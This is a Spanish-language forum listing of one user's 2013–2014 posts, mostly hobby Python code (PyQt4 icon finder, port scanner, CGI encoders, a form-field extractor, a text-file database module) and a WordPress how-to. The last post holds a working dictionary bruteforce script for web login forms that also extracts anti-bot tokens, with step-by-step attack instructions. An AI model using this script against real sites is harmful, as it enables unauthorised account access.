|
Mostrar Temas
|
Páginas: 1 [2] 3 4 5 6
|
11
|
Programación / Desarrollo Web / [WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?
|
en: 9 Abril 2014, 03:42 am
|
Hola nuevamente! Una vez instalado WordPress en nuestro servidor, no queda más que empezar a darle vida al Blog añadiendo entradas (Publicaciones). Al grano... Lo primero, debes ingresar en tu Panel de Administración (/wp-admin) , ahí encontrarás algo como esto Ahí, en el menú izquierdo encontrarás el enlace " Entradas" , al poner el mouse encima, te dará estas opciones Una vez ahí dentro creo que el panel es muy intuitivo, por lo que hay cosas que no es necesario desarrollar. Contamos con opciones para personalizar el formato de la entrada que estamos agregando: Más abajo el panel nos da 2 posibilidades respecto a la Categoría de nuestra entrada: - Especificar la categoría de nuestra entrada, si no seleccionas alguna, por defecto quedará en "Sin categoría".
- Añadir una nueva categoría.
Otra de las opciones que nos provee WordPress, es la posibilidad de añadir etiquetas a nuestra entrada. Es totalmente opcional ingresar algunas etiquetas, pero si lo recomiendan para ayudar al buscador interno a encontrar las cosas, por lo general son como las palabras claves. La imagen que añadas en esta sección será la que acompañe como recurso gráfico a la entrada.
Si tienes alguna duda respecto al funcionamiento de alguna función al añadir entradas, puedes hacer la pregunta respondiendo a esta entrada. Con gusto será respondida Puedes compartir esta entrada en Twitter
Fuente: http://miweb.in/como-anadir-una-entrada-en-wordpress-3-8-2/Saludos, Javier.
|
|
|
13
|
Sistemas Operativos / Windows / "Validar" Mi software
|
en: 4 Noviembre 2013, 04:19 am
|
Hola, muy buenos días.
De antemano pedir disculpas si publico en la sección equivocada
Al grano... He creado una aplicación en PyQT4 , la cuál logré convertir a .exe mediante el ya popular py2exe.
¿ Cuál es el problema ?
Al dar un link de descarga y posteriormente ejecutar, dice Windows que la aplicación no es segura y pide confirmación para su ejecución... Como podría yo solucionar ese tema y hacer que al descargar el programa, no diga que la app no es segura ?
El soft no es nada malicioso, de hecho es algo así como un buscador...
Saludos!
|
|
|
14
|
Programación / Scripting / [Código-PyQT4] IconFinder - JaAViEr | 0x5d
|
en: 31 Octubre 2013, 12:01 pm
|
Hola, buen día ! Hoy navegando por la web "Daw-Labs", me topé con que el compañero WindHack creó una aplicación para buscar iconos en https://www.iconfinder.com . Intenté hacerlo igual visualmente, pero en PyQT4 (además me sirvió de práctica) espero os guste : # -*- coding: utf-8 -*- # Autor: 0x5d | JaAViEr # Twitter: @0x5d from PyQt4 import QtGui, QtCore, QtWebKit import sys import urllib import re try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: def _fromUtf8(s): return s class programa(QtGui.QWidget): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.msg = QtGui.QMessageBox(self) self.msg.setWindowTitle(_fromUtf8("Información")) self.setWindowTitle(_fromUtf8('IconFinder PyQT4 Version | 0x5d')) self.resize(529, 440) self.input_busqueda = QtGui.QLineEdit(self) self.input_busqueda.setGeometry(10, 20, 371, 20) self.boton_buscar = QtGui.QPushButton("Buscar", self) self.boton_buscar.setGeometry(390, 10, 61, 41) self.boton_guardar = QtGui.QPushButton("Guardar", self) self.boton_guardar.setGeometry(455, 10, 61, 41) self.connect(self.boton_guardar, QtCore.SIGNAL("clicked()"), self.guardar) #TABLA ORDENADORA DE RESULTADOS self.tabla = QtGui.QTreeWidget(self) self.tabla.setGeometry(0, 195, 530, 246) self.tabla.headerItem().setText(0, "#") self.tabla.headerItem().setText(1, "Id.") self.tabla.headerItem().setText(2, _fromUtf8("Tamaño")) self.tabla.headerItem().setText(3, "Url") #FIN TABLA self.grupo_options = QtGui.QGroupBox(self) self.grupo_options.setGeometry(10, 47, 291, 101) self.icon_perpage_label = QtGui.QLabel(self.grupo_options) self.icon_perpage_label.setGeometry(20, 30, 90, 16) self.icons_perpage_spin = QtGui.QSpinBox(self.grupo_options) self.icons_perpage_spin.setGeometry(113, 27, 47, 22) self.icons_perpage_spin.setProperty("value", 20) self.minimum_size_label = QtGui.QLabel(self.grupo_options) self.minimum_size_label.setGeometry(20, 70, 100, 13) self.minimum_size_spin = QtGui.QSpinBox(self.grupo_options) self.minimum_size_spin.setMaximum(190) self.minimum_size_spin.setGeometry(113, 65, 47, 22) self.minimum_size_spin.setProperty("value", 16) self.maximum_size_label = QtGui.QLabel(self.grupo_options) self.maximum_size_label.setGeometry(170, 70, 70, 13) self.maximum_size_spin = QtGui.QSpinBox(self.grupo_options) self.maximum_size_spin.setGeometry(241, 67, 42, 22) self.maximum_size_spin.setMaximum(190) self.maximum_size_spin.setProperty("value", 40) self.grupo_preview = QtGui.QGroupBox(self) self.grupo_preview.setGeometry(320, 47, 201, 141) self.total_results_label = QtGui.QLabel(self) self.total_results_label.setGeometry(20, 145, 81, 21) self.total_results_label.setStyleSheet("font-weight: bold;") self.numero_results_label = QtGui.QLabel(self) self.numero_results_label.setGeometry(100, 145, 31, 21) self.numero_results_label.setStyleSheet("font-weight: bold;") self.viewing_page_label = QtGui.QLabel(self) self.viewing_page_label.setGeometry(132, 145, 91, 21) self.viewing_page_label.setStyleSheet("font-weight: bold;") self.number_vpage_label = QtGui.QLabel(self) self.number_vpage_label.setGeometry(190, 145, 51, 21) self.number_vpage_label.setStyleSheet("font-weight: bold;") self.go_page_label = QtGui.QLabel(_fromUtf8("Ir a página:"), self) self.go_page_label.setGeometry(20, 170, 71, 16) self.go_page_label.setStyleSheet("font-weight: bold;") self.go_page_spin = QtGui.QSpinBox(self) self.go_page_spin.setGeometry(89, 168, 42, 22) self.grupo_options.setTitle("Opciones") self.icon_perpage_label.setText(_fromUtf8("Iconos por página:")) self.minimum_size_label.setText(_fromUtf8("Tamaño mínimo :")) self.maximum_size_label.setText(_fromUtf8("Tam. máximo:")) self.grupo_preview.setTitle("Prevista") self.total_results_label.setText("Resultados:") self.numero_results_label.setText("0") self.viewing_page_label.setText(_fromUtf8("| Página:")) self.number_vpage_label.setText("0") self.connect(self.boton_buscar, QtCore.SIGNAL("clicked()"), self.buscar) self.connect(self.tabla, QtCore.SIGNAL('itemClicked(QTreeWidgetItem*, int)'), self.ver_link) self.preview = QtWebKit.QWebView(self.grupo_preview) self.preview.setGeometry(6, 16, 191, 115) #Twitter Logo # self.twitter = QtWebKit.QWebView(self) # self.twitter.setGeometry(280, 0, 121, 80) # self.twitter.setStyleSheet("background-color: transparent; ") # self.twitter.setHtml("<center><a href='#' onclick='window.open(\"http://www.google.cl\")'><img src='%s' width=53 height=53 border=0></a></center>" % ("https://cdn3.iconfinder.com/data/icons/follow-me/256/Twitter-64.png")) self.connect(self.input_busqueda, QtCore.SIGNAL("returnPressed()"), self.buscar) self.connect(self, QtCore.SIGNAL("closeEvent()"), self.close) def guardar(self): archivo = QtGui.QFileDialog.getSaveFileName(self, self.tr("Guardar Archivo"), ".") try: loader = urllib.urlopen(str(self.url)).read() file = open(archivo, "wb") file.write(loader) file.close() self.msg.setText(_fromUtf8("Tu archivo se guardó con éxito")) except: self.msg.setText(_fromUtf8("¡Tu archivo no se pudo guardar!")) pass self.msg.exec_() def ver_link(self, item, i): self.url = item.text(3) self.preview.setStyleSheet("background-color: transparent; ") self.preview.setHtml("<center><img src='%s'></center>" % self.url) def buscar(self): self.tabla.clear() q = str(self.input_busqueda.text()) icons_perpage = self.icons_perpage_spin.value() min_size = self.minimum_size_spin.value() max_size = self.maximum_size_spin.value() page = self.go_page_spin.value() url = urllib.urlopen("https://www.iconfinder.com/xml/search/?q=%s&c=%s&min=%s&max=%s&p=%s&api_key=4c5b276337af418894c87590412e4e39" % (q, icons_perpage, min_size, max_size, page)).read() x = url.split("<icon>") id = [] size = [] image = [] for d in x: for idx in re.findall("<id>(.+?)<\/id>", d): id.append(idx) for sizex in re.findall("<size>(.+?)<\/size>", d): size.append(sizex) for imagex in re.findall("<image>(.+?)<\/image>", d): image.append(imagex) count = 1; for i, idx, sizex, imagex in zip(range(len(id)), id, size, image): exec("item_%s = QtGui.QTreeWidgetItem(self.tabla)"%i) self.tabla.topLevelItem(i).setText(0, str(count)) self.tabla.topLevelItem(i).setText(1, str(idx)) self.tabla.topLevelItem(i).setText(2, str(sizex)) self.tabla.topLevelItem(i).setText(3, str(imagex)) count += 1 self.number_vpage_label.setText(str(page)) self.numero_results_label.setText(str(count-1)) app = QtGui.QApplication(sys.argv) form = programa() form.show() app.exec_()
|
|
|
15
|
Programación / Scripting / [Código-PyQT4] Escaner de Puertos - JaAViEr | 0x5d
|
en: 31 Octubre 2013, 04:59 am
|
Hola ! Luego de meses o quizás año sin tocar la librería QT4 de Python, hoy me quise re-encantar con dicha lib. Ya se me olvidó todo, a tal punto que tuve que re-leer el mismo tutorial que hice hace un tiempo, pero viendo algunos códigos viejos que hice, ya recordé algo ... (...) Sin embargo no traigo un graaaaaan código, solo es un Escaner de puertos, con algo de CSS : # -*- coding: utf-8 -*- # self.setGeometry(X, Y, Width, Height) from PyQt4 import QtGui, QtCore import sys import httplib class programa(QtGui.QWidget): def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.setFixedSize(230, 110) self.setWindowTitle("Escaner de Puertos") self.setStyleSheet("background: #000;") # URL , LABEL URL self.url = QtGui.QLineEdit(self) self.url.setGeometry(27, 10, 200, 20) self.url.setStyleSheet("color: #fff; background: #000;") self.url_label = QtGui.QLabel("URL:", self) self.url_label.setStyleSheet("color: #fff;") self.url_label.setGeometry(3, 10, 25, 20) # PUERTO, LABEL PUERTO self.puerto = QtGui.QLineEdit(self) self.puerto.setGeometry(41, 35, 40, 20) self.puerto.setStyleSheet("color: #fff; font-weight: bold; background: #000;") self.puerto_label = QtGui.QLabel("Puerto:", self) self.puerto_label.setStyleSheet("color: #fff;") self.puerto_label.setGeometry(3, 36, 35, 20) # STATUS, LABEL STATUS self.status_label = QtGui.QLabel("Estado:", self) self.status_label.setStyleSheet("color: #fff;") self.status_label.setGeometry(3, 60, 50, 20) self.esperando = QtGui.QLabel("Esperando", self) self.esperando.setStyleSheet("color: red; font-weight: bold; background: #000;"); self.esperando.setGeometry(44, 60, 100, 20) # BOTON self.boton = QtGui.QPushButton("Scan!", self) self.boton.setStyleSheet("color: #fff; background: #000; border: 2px solid #fff;") self.boton.setGeometry(3, 85, 225, 20) self.connect(self.boton, QtCore.SIGNAL("clicked()"), self.scan) def scan(self): url = str(self.url.text()) puerto = int(self.puerto.text()) try: conn = httplib.HTTPConnection(url, puerto, timeout=2) BODY = "***filecontents***" conn.request("GET", "/", BODY) resp = conn.getresponse() if resp.status == 200: self.esperando.setStyleSheet("color: green; font-weight: bold") self.esperando.setText("%s Abierto" % puerto) conn.close() except: self.esperando.setStyleSheet("color: red; font-weight: bold") self.esperando.setText("%s Cerrado" % puerto) app = QtGui.QApplication(sys.argv) form = programa() form.show() app.exec_()
Saludos !
|
|
|
16
|
Programación / Scripting / Ruby + GTK
|
en: 2 Agosto 2013, 12:07 pm
|
Hola, buen día a todos.
Decidí incursionar en Ruby, pues vengo de Python y se me hizo fácil la migración, incluso encuentro más simple ruby en eso de las REGEX, en fin, voy al grano...
En PyQT4 cuando yo creaba un objeto, lo ubicaba según X e Y además le daba las dimensiones al objeto, todo estoy con objecto.setGeometry() , entonces mi duda es ...
¿ Cuál es el equivalente de setGeometry en Ruby GTK ?
Saludos, Javier.
|
|
|
17
|
Programación / Scripting / [Proyecto]PyDB - "Bases de Datos" fáciles en Python :: JaAViEr | 0x5d
|
en: 23 Julio 2013, 14:35 pm
|
Hola, muy buenos días ! En esta oportunidad vengo a presentar un mini proyecto que estoy iniciando con mucho entusiasmo, espero algunas personas se animen y ayuden a expandir este módulo ! . Sin más preámbulos... ¿ Qué es PyDB ?PyDB es un módulo que te ayudará a crear Bases de Datos a partir de archivos de texto, siempre y cuando estos archivos contengan una estructura legible para PyDB
¿ Dónde descargo el módulo ? El enlace para descargar el módulo es PyDB - SourceForgeEn el mismo README.txt está la documentación de cada función del PyDB, como se utilizan y los parámetros que le deben pasar a cada función. Funciones : - Añadir valor. (En SQL -> INSERT INTO)
- Eliminar valor. (En SQL -> DELETE FROM tabla WHERE columna=valor)
- Actualizar valor (En SQL -> UPDATE)
- Ver Tabla.
- Consultar valor (En SQL -> SELECT campo FROM tabla)
- Ver columnas de tabla .
¿ Cuál es la estrucutra de la Base de Datos ? Base_Datos.Txt : Tabla(columna1, columna2){ columna1=Contenido columna1; columna2=Contenido columna2; } Personas(nombre, edad, correo){ nombre=Javier Guajardo; edad=19; correo=javier.guajardo@vodale.com; nombre=Juan Andres; edad=25; correo=contacto@dominio.com; }
Ejemplo de login con PyDB , disponible para la descarga en Ejemplo PyDB - SourceForgeNota: Recuerda tener el módulo db.py en la misma carpeta de donde invocarás el archivo.Espero sus más sinceras opiniones ! Saludos, Javier.
|
|
|
18
|
Programación / Scripting / Tools Python CGI + Source | JaAViEr::0x5d
|
en: 24 Abril 2013, 15:55 pm
|
Hola, buen día damas y caballeros . En esta ocasión vengo a mostrar el código de fuente de unas aplicaciones que pasé a Python CGI , para poder ejecutarlas en el servidor y no depender de una maquina con Python instalado... Sin más preámbulos, los enlaces son los siguientes: Sus respectivos códigos de fuente... De/Codificador Base64: #!/usr/bin/python #Autor: 0x5d::JaAViEr #Twitter: @0x5d import cgi, os, base64 def form_inicial(): form_html = ''' <form action="" method="POST"> <textarea name="content"></textarea><br /> <select name="option"> <option value="encode">Codificar</option> <option value="decode">Decodificar</option> </select><br /> <input type="Submit" value="Enviar"><br /> Creado bajo Python CGI.<br /> Autor : JaAViEr (0x5d) </form>''' return base("De/Codificar Base64", form_html) def base(title, content): code = ''' <div class="ui-widget-content"> <div class="ui-widget-header">%s</div> %s </div> '''%(title, content) return code print "content-type:text/html\r\n\r\n" print ''' <title>De/Codificador Base64</title> <script src="http://code.jquery.com/jquery-latest.js"></script> <link rel="stylesheet" href="http://code.jquery.com/ui/1.9.1/themes/cupertino/jquery-ui.css" /> <script src="http://code.jquery.com/ui/1.9.1/jquery-ui.js"></script> <link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css" /> <style> div { text-align:center; font-size:0.5cm; } input, select { height:0.7cm; font-size:0.4cm; } </style> ''' form = cgi.FieldStorage() opcion = form.getvalue("option") texto = form.getvalue("content") method = os.environ['REQUEST_METHOD'] if method == "POST": if opcion: if opcion == "encode": print form_inicial() print base("Salida", "<textarea>"+cgi.escape(base64.b64encode(texto))+"</textarea>") elif opcion == "decode": print form_inicial() print base("Salida", "<textarea>"+cgi.escape(base64.b64decode(texto))+"</textarea>") else: print form_inicial() print base("Error", "Opción incorrecta") else: print form_inicial() print base("Error", "Por favor selecciona una opción") else: print form_inicial()
Cifrar Rot13 / Atbash: #!/usr/bin/python #Autor: 11Sep #To CGI: 0x5d::JaAViEr #Twitter: @0x5d import cgi, os def formulario_inicial(): form_html = ''' <form action="" method="POST"> Data: <br/> <textarea name="contenido"></textarea><br /> <select name="opcion"> <option value="rot13">ROT13</option> <option value="atbash">Atbash</option> </select><br /> <input type="Submit"><br/> Programado por <b>11Sep</b><br /> Programado en CGI por <b>JaAViEr::0x5d</b> </form> ''' return base("Cifrar Rot13/Atbash", form_html) def base(title, content): code = ''' <div class="ui-widget-content"> <div class="ui-widget-header">%s</div> %s </div> '''%(title, content) return code def rot13(palabra): Cifrado = '' for i in palabra: buff = ord(i) if (buff >= 65 and buff <= 90) or (buff >= 97 and buff <= 122): if ((buff + 13 > 90 and buff + 13 <= 103) or (buff + 13 > 122 and buff + 13 <= 135)): Cifrado += chr(buff -13) else: Cifrado += chr(buff + 13) return Cifrado def atbash(palabra): V1 = "abcdefghijklm" V2 = "zyxwvutsrqpon" Buff = "" for i in range(len(palabra)): for a in range(len(V1)): if V1[a] == palabra[i]: Buff += V2[a] elif V2[a] == palabra[i]: Buff += V1[a] return Buff print "content-type:text/html\r\n\r\n" print ''' <title>Cifrar Rot13/Atbash 11Sep::JaAViEr</title> <script src="http://code.jquery.com/jquery-latest.js"></script> <link rel="stylesheet" href="http://code.jquery.com/ui/1.9.1/themes/blitzer/jquery-ui.css" /> <script src="http://code.jquery.com/ui/1.9.1/jquery-ui.js"></script> <link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css" /> <style> div { text-align:center; font-size:0.5cm; } input, select { height:0.7cm; font-size:0.4cm; } </style> ''' form = cgi.FieldStorage() method = os.environ['REQUEST_METHOD'] contenido = form.getvalue("contenido") opcion = form.getvalue("opcion") if method == "POST": if opcion: if opcion == "rot13": print formulario_inicial() print base("Salida", "<textarea>"+rot13(contenido)+"</textarea>") elif opcion == "atbash": print formulario_inicial() print base("Salida", "<textarea>"+atbash(contenido)+"</textarea>") else: print formulario_inicial() print base("ERROR","Opción inválida") else: print formulario_inicial()
Enviar peticiones POST: #!/usr/bin/python #Autor: 0x5d::JaAViEr #Twitter: @0x5d import cgi, os, urllib, sys def base(title, content): code = ''' <div class="ui-widget-content"> <div class="ui-widget-header">%s</div> %s </div> '''%(title, content) return code print "content-type:text/html\r\n\r\n" print ''' <title>Enviar datos POST online :: JaAViEr(0x5d)</title> <script src="http://code.jquery.com/jquery-latest.js"></script> <link rel="stylesheet" href="http://code.jquery.com/ui/1.9.1/themes/cupertino/jquery-ui.css" /> <script src="http://code.jquery.com/ui/1.9.1/jquery-ui.js"></script> <link rel="stylesheet" href="http://jqueryui.com/resources/demos/style.css" /> <style> div { text-align:center; font-size:0.5cm; } input, select { height:0.7cm; font-size:0.4cm; } </style> ''' form = cgi.FieldStorage() method = os.environ['REQUEST_METHOD'] campos = form.getvalue("campos") valores = form.getvalue("valores") url = form.getvalue("url") if method == "POST": dic = {} if not "http://" in url: print base("ERROR!","No se puede conectar a %s<br/><a href='send_post.py'>Volver</a>"%cgi.escape(url)) sys.exit(1) if len(campos)>0 and len(valores)>0: for d,i in zip(campos.split(),valores.split(":-:")): dic['%s'%d] = i try: print urllib.urlopen(url, urllib.urlencode(dic)).read() except: print "No se puede conectar a", cgi.escape(url) else: form_html = ''' <form action="" method="POST"> URL: <input type="Text" name="url" value="http://"><br /> Campos (separados por un espacio): <input type="Text" name="campos"><br /> Campos (separados por ":-:"): <input type="Text" name="valores"><br /> <input type="Submit"><br/> Funcionando bajo Python CGI<br /> Author: <u>JaAViEr::0x5d</u> </form> ''' print base("ENVIAR DATOS POR POST", form_html) form_example = ''' URL: <input type="Text" name="url" value="http://web.com/login.php" disabled><br /> Campos (separados por un espacio): <input type="Text" name="campos" value="user password" disabled><br /> Campos (separados por ":-:"): <input type="Text" name="valores" value="0x5d:-:miclave123" disabled><br /> <input type="Submit" onclick=alert("TEST");><br/> ''' print base("Ejemplo de uso", form_example)
Fuente: http://www.vodale.com/blog/tools-python-cgi-source-jaavier0x5d/ Saludos , Javier.
|
|
|
19
|
Programación / Scripting / [Código-Python]Extractor de formularios+sus propiedades+Inputs - JaAViEr (0x5d)
|
en: 21 Marzo 2013, 16:59 pm
|
Hola, muy buen día a todos. Volviendo a las canchas con Python, os traigo un detector de formularios, con las siguientes características : - Lee las urls dentro de un archivo de texto. Separando las url's por un ENTER
- El programa detecta todos los formularios de las webs
- Nos entregará propiedades del <form> , tipo "method", "name", "id", "onsubmit", etc
- Devuelve los campos input de cada formulario, junto a sus propiedades, tipo "name", "value", "type", "id", "class", etc
Sin más preámbulos... El código : # Autor : 0x5d - JaAViEr # Twitter : @0x5d import sys, urllib2, re try: urls = open(raw_input("Archivo ::> "), "r") except: print "Error al intentar abrir el archivo." sys.exit(1) for a in urls: web = urllib2.urlopen(a).read() busca_form = re.findall("<form(.*)>", web) for b in busca_form: url_action = re.findall("action=(.*)", b)[0].split()[0].translate(None, "><\"'").replace("&","&") if len(url_action) == 0: url_action = a.replace("&","&") print "\n\nURL:", url_action print "\nPropiedades del <form>:" formularios = web.split("<form") f = 0 for c, d in zip(b.split(), formularios): propiedades = re.findall("(.*)=\"(.*)\"", c) if propiedades and not "action" in propiedades[0][0]: print propiedades[0][0], ":", propiedades[0][1] inputs = re.findall("<input(.*)", web.split("<form")[f].split("</form>")[0]) f += 1 print "-"*20 for g in inputs: print "<INPUT>:" for h in g.split(): propiedades_input = re.findall("(.*)=(.*)", h) if propiedades_input and len(propiedades_input[0][0])>0: print propiedades_input[0][0], ":", propiedades_input[0][1].split(">")[0] print "-"*20
Ejemplo de archivo urls.txt: http://www.vodale.com/chat_xxx/login.php
Ojo que pueden poner muchas url's hacia abajo Salida: Archivo ::> urls.txt URL: http://www.vodale.com/chat_xxx/login.php Propiedades del <form>: method : POST -------------------- <INPUT>: type : "text" -------------------- name : "log" -------------------- <INPUT>: type : "text" -------------------- name : pwd -------------------- <INPUT>: type : "Submit" -------------------- value : "Login" --------------------
Como ven, dice <INPUT> y abajo la propiedad de cada input. Un ejemplo con la salida de un SMF... urls.txt http://www.portalhacker.net/index.php?action=login
Salida: Archivo ::> urls.rxr URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=login2 Propiedades del <form>: id : guest_form method : post accept-charset : UTF-8 -------------------- <INPUT>: type : "text" -------------------- name : "user" -------------------- size : "20" -------------------- value : "" -------------------- class : "input_text" -------------------- <INPUT>: type : "password" -------------------- name : "passwrd" -------------------- value : "" -------------------- size : "20" -------------------- class : "input_password" -------------------- <INPUT>: type : "text" -------------------- name : "cookielength" -------------------- size : "4" -------------------- maxlength : "4" -------------------- value : "90000" -------------------- class : "input_text" -------------------- <INPUT>: type : "checkbox" -------------------- name : "cookieneverexp" -------------------- class : "input_check" -------------------- onclick : "this.form.cookielength.disabled -------------------- <INPUT>: type : "submit" -------------------- value : "Ingresar" -------------------- class : "button_submit" -------------------- <INPUT>: type : "hidden" -------------------- name : "hash_passwrd" -------------------- value : "" -------------------- URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=search2 Propiedades del <form>: method : post accept-charset : UTF-8 -------------------- <INPUT>: type : "text" -------------------- name : "search" -------------------- class : "inputbox" -------------------- value : "Buscar..." -------------------- onfocus : "this.value -------------------- onblur="if(this.value= : '') -------------------- this.value : 'Buscar...';" -------------------- <INPUT>: type : "hidden" -------------------- name : "advanced" -------------------- value : "0" -------------------- URL: http://www.portalhacker.net/index.php?PHPSESSID=17d1201149f3def8b534505196245624&action=login2 Propiedades del <form>: name : frmLogin id : frmLogin method : post -------------------- <INPUT>: type : "text" -------------------- name : "user" -------------------- size : "20" -------------------- value : "" -------------------- class : "input_text" -------------------- <INPUT>: type : "password" -------------------- name : "passwrd" -------------------- value : "" -------------------- size : "20" -------------------- class : "input_password" -------------------- <INPUT>: type : "text" -------------------- name : "cookielength" -------------------- size : "4" -------------------- maxlength : "4" -------------------- value : "90000" -------------------- class : "input_text" -------------------- <INPUT>: type : "checkbox" -------------------- name : "cookieneverexp" -------------------- class : "input_check" -------------------- onclick : "this.form.cookielength.disabled -------------------- <INPUT>: type : "submit" -------------------- value : "Ingresar" -------------------- class : "button_submit" -------------------- <INPUT>: type : "hidden" -------------------- name : "hash_passwrd" -------------------- value : "" --------------------
Ahí se aprecia mejor la salida de las propiedades del <form> Lo hice con un poco de inspiración , sé que nadie va a comentar , pero igual lo dejo por acá , quizás a alguien le llegue a servir el bichito Saludos , Javier.
|
|
|
20
|
Programación / Scripting / [Código-Python]Bruteforce logins - JaAViEr (0000x5d)
|
en: 20 Marzo 2013, 21:31 pm
|
¡ Hola, buen día ! Hace meses que no programaba, entre viajes, no había donde ni como programar... Y hoy por la mañana me entusiasmé y me puse a codear un BruteForce para algunos formularios que son " débiles". El funcionamiento es el típico ... Solo que tiene algo que lo hace un poco (por no decir "NADA") diferente. Le añadí la opción de extraer tokens que usualmente utilizan para seguridad anti-bots (lo que deja demostrado que siguen siendo inútiles los tokens ). Sin más preámbulos, os enseñaré como utilizarlo . Al correr el Python en cuestión , nos dirá " Se necesita token ?(s/n): " Si el formulario que ustedes van a atacar, funciona con el sistemita ese de los tokens, entonces denle "s" o "S" y enter ... De ser así, os pedirá el nombre del campo del token que se envía , para así el programa buscarlo y poder enviarlo en cada petición... De lo contrario, simplemente pongan n o N y al siguiente paso... El siguiente es el vital y el que nos permitirá saber cuando nuestro login es válido ... Mensaje de error . ¿ Cómo saber dicho mensaje ? Van al formulario, ingresan un usuario y contraseña incorrectos. Les devolverá algo tipo : "Credenciales inválidas", "Usuario o contraseña incorrectos", "Error al ingresar", ETCEntonces nosotros tomamos una palabrita de ellas, "Error" o "incorrectos" o el que les salga a ustedes. Este mensaje es el que nos ayudará a ver que nuestro usuario & contraseña funcionen. Posteriormente, el programa nos dirá " Campo user: " , que es el nombre del Input que envía el formulario , por ejemplo <input type="text" name="user"> , entonces ingresan "user".Luego, " Campo password: ". Vamos al source y buscamos el type="password" , miramos su propiedad name (por ejemplo <input type="password" name="clave"> e ingresamos "clave" en el programa. Seguido de eso, nos pedirá un " Archivo(Diccionario): " Que es con el diccionario que atacaremos el formulario, ahí ingresas la ruta de vuestro diccionario. Y como ultima cosa, nos preguntará ... Campos adicionales ?(s/n) Por si envía algún dato en hidden el formulario. La manera de insertar el campo es la siguiente: NAME VALUE Data:redirect_to /wp-admin Data:remember_me 1
Que sería el equivalente a <input type="hidden" name="redirect_to" value="/wp-admin"> <input type="hidden" name="remember_me" value="1">
Luego dirá "Data:" y para correr el bruteforce, tipeamos "//brute" y paff , buscará el login correcto. # Autor : 0x5d || JaAViEr # Twitter : @0x5D import urllib import sys import re import urllib2 class brute: def __init__(self): self.nombre_token = "" self.valor_token = "" self.actualizar_formulario = "" global formulario formulario = {} self.buscar_hash = raw_input("Se necesita token ?(s/n): ") self.buscar_hash = True if self.buscar_hash.lower() == "s" else False self.url_form = "" # URL donde se encuentra el formulario if self.buscar_hash: if self.extraer_token(): print "Token FOUND" else: print "Token Not Found :( " self.url_to_post = "" # URL donde se envia el formulario self.mensaje_error = raw_input("Mensaje de Error: ") # Mensaje de error, para detectar un login correcto self.campo_usuario = raw_input("Campo user: ") # Nombre del campo (input) del usuario self.campo_password = raw_input("Campo password: ") # Nombre del campo (input) del password self.archivo_diccionario = raw_input("Archivo(Diccionario): ") # Archivo con Diccionario self.datos_adicionales = raw_input("Campos adicionales? (s/n): ") self.respuesta_adicionales = True if self.datos_adicionales.lower() == "s" else False self.estado_token = True if self.respuesta_adicionales: self.agregar_campos() self.bruteforce() def agregar_campos(self): formulario = {} while self.respuesta_adicionales: data = raw_input('Data: ') parse_data = data.split(" ") if data != "//brute": formulario.update({parse_data[0]:parse_data[1]}) print formulario else: break def extraer_token(self): estado_token = True if len(self.nombre_token)<=0: self.nombre_token = raw_input("Nombre del token: ") while estado_token: try: buscar = urllib2.urlopen(self.url_form) if self.nombre_token in buscar.read(): estado_token = False buscar_token = urllib2.urlopen(self.url_form) found = re.findall("name=\"%s\" (.*)"%self.nombre_token, buscar_token.read()) if len(found)>0: for i in range(len(found)): if "value=\"" in found[i]: self.split_token = re.findall("value=\"(.*)\"", found[i]) self.valor_token = self.split_token[0] return True else: return False else: return False else: return False except: return False def bruteforce(self): cookie = urllib2.HTTPCookieProcessor() opener = urllib2.build_opener(cookie) urllib2.install_opener(opener) estado_archivo = True while estado_archivo: try: cargar_diccionario = open(self.archivo_diccionario, "r") separar_datos = cargar_diccionario.read().split("\n") estado_archivo = False except: print "No se encuentra el archivo mencionado" self.archivo_diccionario = raw_input("Archivo(Diccionario): ") print "Buscando el login correcto ..." for users in separar_datos: for passwords in separar_datos: if self.buscar_hash: datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords, self.nombre_token:self.valor_token}) else: datos_form = formulario.update({self.campo_usuario:users, self.campo_password:passwords}) enviar_formulario = urllib2.urlopen(self.url_to_post, urllib.urlencode(formulario)) if self.mensaje_error in enviar_formulario.read(): print ".", else: print "\nFound User:%s - Password:%s"%(users, passwords) sys.exit(1) cargar_diccionario.close() bf = brute()
Le faltan mil cosas por pulir ... Luego lo pasaré para que lea parámetros por ARGV . Para ingresar la URL del formulario deben editar la línea : self.url_form = "" # URL DEL FORMULARIO self.url_to_post = "" # URL DONDE SE ENVIA EL FORM
Ojo, que a veces el formulario envía el POST al mismo archivo, pero no siempre ! . Pido el URL del formulario para poder extraer los tokens previo envío , posteriormente, envío todos los datos a la URL que procesa los datos Espero sea de su agrado. Fuente : http://www.vodale.com/blogSaludos, Javier.
|
|
|
|
|
|
|